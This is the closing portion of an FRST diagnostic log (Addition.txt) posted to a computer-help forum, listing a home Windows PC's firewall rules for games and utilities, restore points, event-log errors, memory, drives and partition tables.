    FirewallRules: [{D1348AB0-4C36-4E08-AEE7-833E635A6B76}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
    FirewallRules: [{7FC743AA-D733-419F-8042-A035AD45F3B5}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
    FirewallRules: [{F5F95BD3-A35E-44EE-A112-E2F68B3D3A0A}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
    FirewallRules: [{112C8525-A869-473F-A5AE-968AEB8835F7}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
    FirewallRules: [{20B0CC62-3200-4EEF-B0B7-37B644402890}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
    FirewallRules: [{EF08C331-87FB-4CC5-ACB3-8EE65B40BA62}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
    FirewallRules: [{BF9681B5-75E6-4BB8-A9E8-33A6536FD70F}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
    FirewallRules: [{D7D86F73-58B4-4297-BD11-31694ED9AAE0}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
    FirewallRules: [{DD0DCF4C-E8E1-49DD-900A-DD6AC7BC5C3C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
    FirewallRules: [{CF01C627-5181-49F6-8E87-A4C0CBDD7CA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
    FirewallRules: [{7E20D8C2-63C2-4175-95E6-1343C3ECD0C6}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
    FirewallRules: [{491A2AED-C695-4F06-BA71-CB7838E9C4FF}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
    FirewallRules: [{5E2969A1-BE68-4265-A8FC-7097A7ECBB11}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
    FirewallRules: [{74E554AC-E08A-4335-B417-29987ADE8453}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
    FirewallRules: [{A03CA821-5944-4FD4-AA99-63D9A7D540E2}] => (Allow) D:\Hearthstone\Hearthstone.exe
    FirewallRules: [{7D59F7B3-275B-4781-B5B3-F54F6611ABE6}] => (Allow) D:\Hearthstone\Hearthstone.exe
    FirewallRules: [{A01AFC7A-FADD-4E17-B5C6-7189DE2CD1CE}] => (Allow) D:\StarCraft II\StarCraft II.exe
    FirewallRules: [{700AEC12-F515-4E9F-AE1F-ACFE78622256}] => (Allow) D:\StarCraft II\StarCraft II.exe
    FirewallRules: [{ABA0ADF7-7B84-4F79-85B1-13F0FF4024DE}] => (Allow) D:\Diablo III\Diablo III.exe
    FirewallRules: [{6CF41658-1CD6-4500-AC43-A82F127ACABB}] => (Allow) D:\Diablo III\Diablo III.exe
    FirewallRules: [{C2481D3E-C354-4753-BD12-A8F578C331BF}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
    FirewallRules: [{16888A73-5F47-429F-A727-2E2184704346}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
    FirewallRules: [{7CD9AF2C-6572-4973-B88A-D6A325B74B4F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
    FirewallRules: [{F9A7B398-94AE-45D6-8514-BEA802B1E5E2}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
    FirewallRules: [{512EF9C6-D108-459F-8832-0603753D2F89}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{B598ABAB-0FDC-43A9-BD15-FF9FF99D712C}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{E4955EAC-E367-495F-B0A4-89B8B7610B29}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{416A0B8C-2763-42F0-82EB-9269719E1BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{15969D30-C471-468E-B2ED-1594FE384FC3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{08FE19D4-7434-48EA-A27A-93ED53D7717A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{933A444B-2C3D-45AC-80E9-EFE8EB8DAD9D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{EF266A5B-42EB-4853-A982-4DED1ADF6F73}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
    FirewallRules: [{BC4FFE1F-5AF4-4233-8E52-5094D6FE9F07}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
    FirewallRules: [{31F097A5-8E00-4169-A16D-1C9A71721FA1}] => (Allow) D:\Steam\Steam.exe
    FirewallRules: [{F5C42520-0135-45B4-8FB0-5BD9692C80EE}] => (Allow) D:\Steam\Steam.exe
    FirewallRules: [TCP Query User{3D2AB9FC-2A79-4098-9681-6706A621D53F}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
    FirewallRules: [UDP Query User{09124E07-AE4B-4C80-A7E2-E96A37034496}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
    FirewallRules: [{923D26F5-A4EE-433D-BE2B-5CE473180539}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
    FirewallRules: [{E6F2E9A0-F842-4541-8D31-CE38FDD09EDE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
    FirewallRules: [{F906BBDC-3C41-494C-A264-2234D81FEF3E}] => (Block) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Adobe Premiere Elements 11\Adobe Premiere Elements.exe
    FirewallRules: [{BD0F045D-D2C0-41A7-8024-69C5F302A95F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
    FirewallRules: [{7710A3C2-777C-4F45-BA7E-19121D633EB3}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
    FirewallRules: [{7172F858-7B10-43BC-B718-09A53F078F3C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{6B94AB4E-EBC9-430B-A32F-B62386B68D88}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{F70F4B42-49F1-4B1A-B8A8-FCF794C81494}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{045729B0-69AA-489E-BE8C-C51AC1A7B953}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{92708362-07EC-40D9-A2DB-B96340F268FB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
    FirewallRules: [{4B096532-9213-4604-8B21-D8BCE26411CE}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
    FirewallRules: [{0104B469-8DD7-41D2-9979-185C8C113A44}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
    FirewallRules: [{83A03678-B554-4993-9E39-0C22F10E135B}] => (Allow) D:\SPSS\stats.com
    FirewallRules: [{091CE1FB-5C3F-4138-8341-49FEB2CFD24B}] => (Allow) D:\SPSS\stats.exe
    FirewallRules: [{9576161E-2723-4775-B358-84BB54C518DA}] => (Allow) D:\SPSS\stats.com
    FirewallRules: [{5CABC212-DC4A-4B5F-A0FE-532EA8330453}] => (Allow) D:\SPSS\stats.exe
    FirewallRules: [{394EAA14-7FAC-47B7-B3D9-7B4756AB1A7B}] => (Allow) D:\SPSS\WinWrapIDE.exe
    FirewallRules: [{16A7A8A5-316D-425F-870E-5896D1CE4C33}] => (Allow) D:\SPSS\WinWrapIDE.exe
    FirewallRules: [{79364F63-7C39-456E-AB8F-8757D05D824C}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
    FirewallRules: [{54FF873C-F71A-4CCF-8775-0C1D01F98DE2}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
    FirewallRules: [{3B43C12B-BCDF-45BF-B840-0535E1E51BB0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
    FirewallRules: [{E52DF45C-B750-4C08-A94D-1C9E5FD0C9E0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
    FirewallRules: [TCP Query User{5FA1C1D8-35DC-4C59-B59E-E79663992D79}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
    FirewallRules: [UDP Query User{B382372C-70E0-4294-8918-424DD03F9B35}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
    FirewallRules: [{779D02B6-A237-497E-8EA6-A0FE4181802E}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
    FirewallRules: [{8F8BCB79-A539-484F-91B1-F34943ED9B63}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
    FirewallRules: [{FA6B12F6-052C-4390-B321-7E5ED5365770}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
    FirewallRules: [{FD71A44F-D3A8-4A46-B9B5-A3FFF96D2B7A}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
    FirewallRules: [{3E390A03-0EC6-460A-AFF8-07A3B3CE42A7}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{F56F3DD1-6F01-4E52-AF5A-050CF4A4240E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{133D51D8-9D57-49D0-A255-8F344FBE942D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{7EFE47F1-0DAB-47F3-BB87-FB89C0045DAF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{3D3C4B45-00E1-45D2-A21E-63FFE437D631}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

    ==================== Restore Points =========================

    12-02-2016 19:34:43 Windows Update
    15-02-2016 13:41:32 Windows Backup
    18-02-2016 15:21:16 Windows Update
    21-02-2016 16:50:40 Windows Update
    21-02-2016 19:00:07 Windows Backup
    28-02-2016 19:00:09 Windows Backup
    01-03-2016 12:19:24 Restore Point Created by FRST
    01-03-2016 12:35:23 JRT Pre-Junkware Removal

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (03/01/2016 12:50:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:50:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:48:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:35:24 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
    Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

    Details:
    AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

    System Error:
    Access is denied.
    .

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.


    System errors:
    =============
    Error: (03/01/2016 12:52:06 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

    Error: (03/01/2016 12:52:03 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

    Error: (03/01/2016 12:51:58 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

    Error: (03/01/2016 12:51:56 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

    Error: (03/01/2016 12:51:27 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

    Error: (03/01/2016 12:51:27 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.

    Error: (03/01/2016 12:51:22 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

    Error: (03/01/2016 12:51:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.

    Error: (03/01/2016 12:51:10 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

    Error: (03/01/2016 12:51:08 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.


    CodeIntegrity:
    ===================================
    Date: 2016-02-13 23:54:36.285
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.256
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.214
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.157
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.135
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.113
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:35.470
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:35.328
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:51:19.676
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:51:19.646
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
    Percentage of memory in use: 21%
    Total physical RAM: 16271.13 MB
    Available physical RAM: 12742.79 MB
    Total Virtual: 32655.13 MB
    Available Virtual: 28445.88 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:111.69 GB) (Free:16.26 GB) NTFS ==>[drive with boot components (obtained from BCD)]
    Drive d: (New Volume) (Fixed) (Total:931.41 GB) (Free:512.14 GB) NTFS
    Drive f: (Seagate Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:333.52 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4E0A8E17)
    Partition 1: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 1 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: 4B95E549)
    Partition 1: (Active) - (Size=111.7 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 2 (Size: 1863 GB) (Disk ID: 908BDE7D)
    Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

    ==================== End of Addition.txt ============================

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •